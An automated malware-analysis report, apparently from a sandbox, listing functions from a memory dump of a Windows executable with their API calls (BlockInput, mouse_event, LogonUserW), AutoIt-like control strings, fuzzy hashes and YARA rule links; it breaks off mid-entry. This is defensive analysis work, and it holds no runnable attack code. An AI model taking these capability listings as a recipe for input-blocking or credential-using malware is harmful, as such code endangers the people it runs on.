Instruction ID: ab49ce7a42aaaa7ab670c5b5f263986469cd7164052e5ad477d7faa7f3eccbdd
Opcode Fuzzy Hash: fd5e3af75ddb2d6fd7f9f1cf4358c20c25bd2db3069e5d40d384054955356c98
Instruction Fuzzy Hash: A0B12971210648DFD716CF29C486B647BA1FF45365F298A58E8DACF2A1C335ED92CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00A341FD, Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00A34218

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 5e9c17abbd2fa77b6de950d883bf39878bb3c6439b9acee120487aa7cbef4e2a
Instruction ID: f138c7fbca1a6d010d54f716ae0da580050f23714c063715456907a0ed0d5ee0
Opcode Fuzzy Hash: 5e9c17abbd2fa77b6de950d883bf39878bb3c6439b9acee120487aa7cbef4e2a
Instruction Fuzzy Hash: 5CE04F352402149FC710EF9AD844F9BF7E8AF99760F01802AFC49D7362DA70F8418BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A24EF5, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32 ref: 00A24F18

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 9bd9de1e491eb1ec31d8712565efaea0e7727a472b357fb3139dd8a3e93e9a04
Instruction ID: 448627f86d8972babf262f7e94824dc9432e5a5d9985ef9f989a0a4c84d498ca
Opcode Fuzzy Hash: 9bd9de1e491eb1ec31d8712565efaea0e7727a472b357fb3139dd8a3e93e9a04
Instruction Fuzzy Hash: 77D05EB41642253CFC184B28BE0FF760508E3C8F81F8469A93205A5CC5A8E56C00A835

Uniqueness

Uniqueness Score: -1.00%

Function 00A18C93, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(00000001,00000000,?,00000001,00000000,?), ref: 00A18CB3

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 551dad2fa79ec8b3e3658a74b160dfa58bb733d8e552e6f54929cab6a22bee2e
Instruction ID: 6c212a3bf7f0da65324b60c2f72553afab9e291742825dfa05f7056fda47aaca
Opcode Fuzzy Hash: 551dad2fa79ec8b3e3658a74b160dfa58bb733d8e552e6f54929cab6a22bee2e
Instruction Fuzzy Hash: C6D0173629040EABEF018EA4EC01EBF3B69EB41701F408111FA15C50A0C676D425AB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A02230, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00A02242

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: e223fdbed85a67bbeda6c0b93f4119814083c225fb6c210f80f2aaf6f3341f51
Instruction ID: b5d368f9f0e9efc2abf9b1f04b42b91ec210694e1e4e12836397904e680b9b1b
Opcode Fuzzy Hash: e223fdbed85a67bbeda6c0b93f4119814083c225fb6c210f80f2aaf6f3341f51
Instruction Fuzzy Hash: FEC048F980010DDBDB15DBA0EA88DEEB7BCAB89305F2040A6A102F2140E7749B448A71

Uniqueness

Uniqueness Score: -1.00%

Function 009EA364, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,009F4D67,009F4D1C), ref: 009EA36A

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ea5cd5109cecaddbadb03d527c4b6bc454fe37854bf88448be1dded14c3b125b
Instruction ID: 3c9f14d39560483caefff58ebd711d13185e71d1612cb4e023b7ea241bd4b812
Opcode Fuzzy Hash: ea5cd5109cecaddbadb03d527c4b6bc454fe37854bf88448be1dded14c3b125b
Instruction Fuzzy Hash: DEA0027515100DABCA015F91FC05CA57F5DD6475D97015051F41D44421873355515551

Uniqueness

Uniqueness Score: -1.00%

Function 009F89DF, Relevance: .7, Instructions: 712COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59492b3b4ed2c5e94d7a8dd7baed079863677bf61ccb15ba2ec16b181e33459e
Instruction ID: c5e96fbda2c2f2dd887a124d11af9c7add49d73a23d1c12490117d4cf0b39fe5
Opcode Fuzzy Hash: 59492b3b4ed2c5e94d7a8dd7baed079863677bf61ccb15ba2ec16b181e33459e
Instruction Fuzzy Hash: EA328671E0464D8FDB64CFA8C8557FEBBBAFB58310F24852AD655AB281DB348C81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009EF419, Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f77eb9b891c1c2e84357211bb18d7feb0969d1d0f26354824bf58a64c868871
Instruction ID: 7b10ff0488202c1e37e27c46c4116189900307d5286b71ad64bc0c0ae920c48e
Opcode Fuzzy Hash: 1f77eb9b891c1c2e84357211bb18d7feb0969d1d0f26354824bf58a64c868871
Instruction Fuzzy Hash: FE32F122D69F414CD7239635EC32339A24CAFB73D5F25D737F81AB59A6EB2888834100

Uniqueness

Uniqueness Score: -1.00%

Function 009F6522, Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad4a544ae286191124cf1efda456a2251545cba17d97b4b98093d71e0ca58af
Instruction ID: 329d78fc067c981e64e873ddece2ad1bec0f6b61a968383f726a726c4c3a1305
Opcode Fuzzy Hash: fad4a544ae286191124cf1efda456a2251545cba17d97b4b98093d71e0ca58af
Instruction Fuzzy Hash: 8F129272A1021D9FDB04CFA8E8915FDBBB6FBC8324F24462EE621E7294D77069458B50

Uniqueness

Uniqueness Score: -1.00%

Function 009E16C4, Relevance: .5, Instructions: 484COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f6d2af867326b0be1bdf0d2cefadcb819e1f79b4aed5985f074fdecc9acaa9
Instruction ID: c4e9f6697282c527b5ec849c0a0768407ba19f5bf56212f1f8f6a3b02b377c2f
Opcode Fuzzy Hash: a4f6d2af867326b0be1bdf0d2cefadcb819e1f79b4aed5985f074fdecc9acaa9
Instruction Fuzzy Hash: 1402C7322050D209DF2E4A3A997007A7BE9A9523B131E4B6DE4F7CF4C5EE34DDA4D660

Uniqueness

Uniqueness Score: -1.00%

Function 009E2405, Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4096cb73efceecd150e28a7a732ce4b0e9bc57580be86b881f70f8f1571be16
Instruction ID: cf8f3941d7e83721ba9a9f79b3d3511981d73de2be72f7547c065f326f6787e4
Opcode Fuzzy Hash: a4096cb73efceecd150e28a7a732ce4b0e9bc57580be86b881f70f8f1571be16
Instruction Fuzzy Hash: 29C142322050D309DF2E473B957403EBBE9AA627B131B0B5EE4B3DB4D5EE249D64D620

Uniqueness

Uniqueness Score: -1.00%

Function 009E283A, Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5dfebb1dd1c26c2361ea6eddc053901a6c691f7d2db7dc4beed5ede09a01500
Instruction ID: e050a2fa3e0f627cc980c91a2721de9cf412017a8e87f7294acfe0f6d2b6e8f8
Opcode Fuzzy Hash: e5dfebb1dd1c26c2361ea6eddc053901a6c691f7d2db7dc4beed5ede09a01500
Instruction Fuzzy Hash: CDC163332050D30ADF6E473B993403DFBE99A927B131B1B6DE4B2DB4D5EE209D649620

Uniqueness

Uniqueness Score: -1.00%

Function 009E1BB8, Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a22cad81a127f162ab86ed95fec8650648029fa55ab765cf38db7095e7c3809
Instruction ID: 6fe1224bb3ed588ba537895468876ec7dac48f54669e7f1a02684742ffdbd048
Opcode Fuzzy Hash: 1a22cad81a127f162ab86ed95fec8650648029fa55ab765cf38db7095e7c3809
Instruction Fuzzy Hash: 01B152322050D209EF6E463B993403EFBE99A923B131B0B5DE4F3CB4D5EE309D649660

Uniqueness

Uniqueness Score: -1.00%

Function 009F267E, Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 073a11c58fbbd6146985efa49263ca787898d20aa59e198b1b202e4075403a0b
Instruction ID: e4937deec81d65c263e9fa21d4b931fc16525cdb9d09e25f4aeb1228c66c0614
Opcode Fuzzy Hash: 073a11c58fbbd6146985efa49263ca787898d20aa59e198b1b202e4075403a0b
Instruction Fuzzy Hash: B6B1F020E2AF414DD72396798831336BA5CBFBB2DAF51D71BFC2674D62EB2185834241

Uniqueness

Uniqueness Score: -1.00%

Function 009F7006, Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e19dccbb9ef168caf185eacc24d4912cdc75398371c12ad5aff8772d56c71cb8
Instruction ID: 0b65fbbcb50c895cec57bf1310276d3938cfba123eba15d7a0fcdf7f33aef249
Opcode Fuzzy Hash: e19dccbb9ef168caf185eacc24d4912cdc75398371c12ad5aff8772d56c71cb8
Instruction Fuzzy Hash: 82616072E0522A9FDF18CF5DC88056AFBF9EF85310729C16AE909DB309DA70D945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A28B13, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 3be879361cc9a2757d7f03c63feec7ed710823511da06d3ed98bf35874870b59
Instruction ID: 5f39f28c59d8cb731ea47ee17338b92f27343c21624e8648296e4b4db7d27cdd
Opcode Fuzzy Hash: 3be879361cc9a2757d7f03c63feec7ed710823511da06d3ed98bf35874870b59
Instruction Fuzzy Hash: 7B21A2725255108FD329CF69D841A56B3E1EBA5321B288E6CE0F5CB2D0CA74BD45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 009F562B, Relevance: 130.7, APIs: 87, Instructions: 190COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009F563D

Part of subcall function 009E2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,009E9C64), ref: 009E2FA9
Part of subcall function 009E2F95: GetLastError.KERNEL32(00000000,?,009E9C64), ref: 009E2FBB

_free.LIBCMT ref: 009F5645
_free.LIBCMT ref: 009F564D
_free.LIBCMT ref: 009F5655
_free.LIBCMT ref: 009F565D
_free.LIBCMT ref: 009F5665
_free.LIBCMT ref: 009F566C
_free.LIBCMT ref: 009F5674
_free.LIBCMT ref: 009F567C
_free.LIBCMT ref: 009F5684
_free.LIBCMT ref: 009F568C
_free.LIBCMT ref: 009F5694
_free.LIBCMT ref: 009F569C
_free.LIBCMT ref: 009F56A4
_free.LIBCMT ref: 009F56AC
_free.LIBCMT ref: 009F56B4
_free.LIBCMT ref: 009F56BF
_free.LIBCMT ref: 009F56C7
_free.LIBCMT ref: 009F56CF
_free.LIBCMT ref: 009F56D7
_free.LIBCMT ref: 009F56DF
_free.LIBCMT ref: 009F56E7
_free.LIBCMT ref: 009F56EF
_free.LIBCMT ref: 009F56F7
_free.LIBCMT ref: 009F56FF
_free.LIBCMT ref: 009F5707
_free.LIBCMT ref: 009F570F
_free.LIBCMT ref: 009F5717
_free.LIBCMT ref: 009F571F
_free.LIBCMT ref: 009F5727
_free.LIBCMT ref: 009F572F
_free.LIBCMT ref: 009F5737
_free.LIBCMT ref: 009F5745
_free.LIBCMT ref: 009F5750
_free.LIBCMT ref: 009F575B
_free.LIBCMT ref: 009F5766
_free.LIBCMT ref: 009F5771
_free.LIBCMT ref: 009F577C
_free.LIBCMT ref: 009F5787
_free.LIBCMT ref: 009F5792
_free.LIBCMT ref: 009F579D
_free.LIBCMT ref: 009F57A8
_free.LIBCMT ref: 009F57B3
_free.LIBCMT ref: 009F57BE
_free.LIBCMT ref: 009F57C9
_free.LIBCMT ref: 009F57D4
_free.LIBCMT ref: 009F57DF
_free.LIBCMT ref: 009F57EA
_free.LIBCMT ref: 009F57F8
_free.LIBCMT ref: 009F5803
_free.LIBCMT ref: 009F580E
_free.LIBCMT ref: 009F5819
_free.LIBCMT ref: 009F5824
_free.LIBCMT ref: 009F582F
_free.LIBCMT ref: 009F583A
_free.LIBCMT ref: 009F5845
_free.LIBCMT ref: 009F5850
_free.LIBCMT ref: 009F585B
_free.LIBCMT ref: 009F5866
_free.LIBCMT ref: 009F5871
_free.LIBCMT ref: 009F587C
_free.LIBCMT ref: 009F5887
_free.LIBCMT ref: 009F5892
_free.LIBCMT ref: 009F589D
_free.LIBCMT ref: 009F58AB
_free.LIBCMT ref: 009F58B6
_free.LIBCMT ref: 009F58C1
_free.LIBCMT ref: 009F58CC
_free.LIBCMT ref: 009F58D7
_free.LIBCMT ref: 009F58E2
_free.LIBCMT ref: 009F58ED
_free.LIBCMT ref: 009F58F8
_free.LIBCMT ref: 009F5903
_free.LIBCMT ref: 009F590E
_free.LIBCMT ref: 009F5919
_free.LIBCMT ref: 009F5924
_free.LIBCMT ref: 009F592F
_free.LIBCMT ref: 009F593A
_free.LIBCMT ref: 009F5945
_free.LIBCMT ref: 009F5950
_free.LIBCMT ref: 009F595E
_free.LIBCMT ref: 009F5969
_free.LIBCMT ref: 009F5974
_free.LIBCMT ref: 009F597F
_free.LIBCMT ref: 009F598A
_free.LIBCMT ref: 009F5995
_free.LIBCMT ref: 009F59A0

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 96582ba9ba4426dd90cd61ffa0e39f5a918e827e398c35c5bf30e500b19a07f6
Instruction ID: d41d918a08ac92881522150994b00f5aa9be203fafe2f5b0ff441315853e903d
Opcode Fuzzy Hash: 96582ba9ba4426dd90cd61ffa0e39f5a918e827e398c35c5bf30e500b19a07f6
Instruction Fuzzy Hash: 077106B141CB809FD7633BB2DD07B4A7EBA7F88342F144D14B1DE28572AA326C619B51

Uniqueness

Uniqueness Score: -1.00%

Function 00A437F3, Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00A4F910,?), ref: 00A438AF
IsWindowVisible.USER32 ref: 00A438D3

Strings

HIDEDROPDOWN, xrefs: 00A43988
EDITPASTE, xrefs: 00A43BE7
SETCURRENTSELECTION, xrefs: 00A43A3E
CURRENTTAB, xrefs: 00A43945
TABLEFT, xrefs: 00A4390F
ISVISIBLE, xrefs: 00A438BF
GETCURRENTSELECTION, xrefs: 00A43A6B
SHOWDROPDOWN, xrefs: 00A43968
GETCURRENTCOL, xrefs: 00A43BB0
UNCHECK, xrefs: 00A43B0B
CHECK, xrefs: 00A43AF5
DELSTRING, xrefs: 00A439D1
SENDCOMMANDID, xrefs: 00A43C62
FINDSTRING, xrefs: 00A439FE
GETSELECTED, xrefs: 00A43B2B
TABRIGHT, xrefs: 00A43925
ISCHECKED, xrefs: 00A43AC1
GETCURRENTLINE, xrefs: 00A43B75
ADDSTRING, xrefs: 00A4399E
SELECTSTRING, xrefs: 00A43A8E
GETLINE, xrefs: 00A43C23
GETLINECOUNT, xrefs: 00A43B4E
ISENABLED, xrefs: 00A438F3

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 30a27a27499acd549ef3c79228c20b0b949dd9b28ba9d60cc5ed2285962efbb7
Instruction ID: 69c1ae16679f29c48fb13addaa8028a6dee84ae0d98a6b0e92525827cf6d6831
Opcode Fuzzy Hash: 30a27a27499acd549ef3c79228c20b0b949dd9b28ba9d60cc5ed2285962efbb7
Instruction Fuzzy Hash: BED17F39204305DBCF14EF11C955BAAB7A5AFD4354F10845CB88A5B2E3CB71EE8ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A4A849, Relevance: 49.8, APIs: 33, Instructions: 281COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00A4A89F
GetSysColorBrush.USER32(0000000F), ref: 00A4A8D0
GetSysColor.USER32(0000000F), ref: 00A4A8DC
SetBkColor.GDI32(?,000000FF), ref: 00A4A8F6
SelectObject.GDI32(?,?), ref: 00A4A905
InflateRect.USER32(?,000000FF,000000FF), ref: 00A4A930
GetSysColor.USER32(00000010), ref: 00A4A938
CreateSolidBrush.GDI32(00000000), ref: 00A4A93F
FrameRect.USER32 ref: 00A4A94E
DeleteObject.GDI32(00000000), ref: 00A4A955
InflateRect.USER32(?,000000FE,000000FE), ref: 00A4A9A0
FillRect.USER32 ref: 00A4A9D2

Part of subcall function 00A4AB60: GetSysColor.USER32(00000012), ref: 00A4AB99
Part of subcall function 00A4AB60: SetTextColor.GDI32(?,00A4A869), ref: 00A4AB9D
Part of subcall function 00A4AB60: GetSysColorBrush.USER32(0000000F), ref: 00A4ABB3
Part of subcall function 00A4AB60: GetSysColor.USER32(0000000F), ref: 00A4ABBE
Part of subcall function 00A4AB60: GetSysColor.USER32(00000011), ref: 00A4ABDB
Part of subcall function 00A4AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A4ABE9
Part of subcall function 00A4AB60: SelectObject.GDI32(?,00000000), ref: 00A4ABFA
Part of subcall function 00A4AB60: SetBkColor.GDI32(?,?), ref: 00A4AC03
Part of subcall function 00A4AB60: SelectObject.GDI32(?,?), ref: 00A4AC10
Part of subcall function 00A4AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00A4AC2F
Part of subcall function 00A4AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A4AC46
Part of subcall function 00A4AB60: GetWindowLongW.USER32 ref: 00A4AC5B

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongRoundSolidWindow
String ID:
API String ID: 3205543919-0
Opcode ID: d07a090d8f2974944cf88c4fbe504b5b6ca21f0b73347227df2fc2e791168762
Instruction ID: 434fbef1f2412b35c065968578b6cc02cab932e7536237fbbb315473ceb42077
Opcode Fuzzy Hash: d07a090d8f2974944cf88c4fbe504b5b6ca21f0b73347227df2fc2e791168762
Instruction Fuzzy Hash: 1AA17F7A008301FFD710DFA4DC08E6B7BA9FBC9321F105A29F562960A1D772D946CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009C2C18, Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 497windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 009C2CA2
DeleteObject.GDI32(00000000), ref: 009C2CE8
DeleteObject.GDI32(00000000), ref: 009C2CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 009C2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 009C2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 009FC68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 009FC6C4
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 009FCAED

Part of subcall function 009C1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,009C2036,?,00000000,?,?,?,?,009C16CB,00000000,?), ref: 009C1B9A

SendMessageW.USER32(?,00001053), ref: 009FCB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 009FCB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 009FCB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 009FCB62

Strings

0, xrefs: 009FC981

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
